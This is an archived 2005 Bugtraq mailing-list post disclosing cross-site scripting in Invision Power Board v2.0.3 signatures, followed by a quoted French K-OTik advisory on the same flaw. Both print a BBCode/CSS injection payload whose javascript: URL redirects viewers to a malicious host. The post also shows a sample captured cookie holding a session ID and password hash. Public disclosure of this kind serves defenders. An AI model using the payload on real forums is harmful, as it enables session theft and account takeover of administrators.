Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Invision Power Board v2.0.3 XSS vulnerabilities
From: hoang yen <vnwebmasters () yahoo com>
Date: 29 Mar 2005 08:59:28 -0000


Invision Power Board v2.0.3 XSS vulnerabilities found more at user signature. when Admin read attacker topics, admin 
will lost his pass_hash

example
[session_id=f2600ff71ea895e6b9dedb5fd9480d16;%20member_id=48;%20pass_hash=8ee00894ca583f64a85fd41a47048d14;%20topicsread=a%3A7%3A%7Bi%3A498%3Bi%3A1111649756%3Bi%3A485%3Bi%3A1111649822%3Bi%3A494%3Bi%3A1111651530%3Bi%3A488%3Bi%3A1111653254%3Bi%3A481%3Bi%3A1111655869%3Bi%3A490%3Bi%3A1111654241%3Bi%3A250%3Bi%3A1111655785%3B%7D;%20modtids=%2C;%20anonlogin=-1]
 

I post this topic because  v2.0.3 also get bugs not only 1.3.1 and all atacker can hack by this code 

exploit
[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.servermalicieux.com');")

Viethacker.org
Hoangyenxinhdep - dora

-----------------------------------------

Date de Publication : 2005-02-21 © K-OTik.COM - Voir Notice Légale  
Titre: Invision Power Board SML Codes Cross Site Scripting Vulnerability
K-OTik ID : AVIS-2005-0191
Risque : Bas 
Exploitable à distance : Oui
Exploitable en local : Oui

* Description Technique *

Une vulnérabilité a été identifiée dans Invision Power Board, elle pourrait être exploitée par un attaquant afin de 
réaliser des attaques par Cross Site Scripting. Le problème résulte d'une erreur présente au niveau de la gestion des 
signatures qui ne sont pas correctement filtrées, ce qui pourrait être exploité afin d'injection du code HTML coté 
client via une signature spécifique.

[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.servermalicieux.com');")

* Versions Vulnérables *

Invision Power Board version 1.3.1 et inférieures 

* Solution *

Aucune solution officielle pour l'instant

* Références *

http://www.k-otik.com/bugtraq/bulletins/937 

* Crédit *

Vulnérabilités découvertes par Daniel A.

* ChangeLog *

2005-02-21 : Version Initiale

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]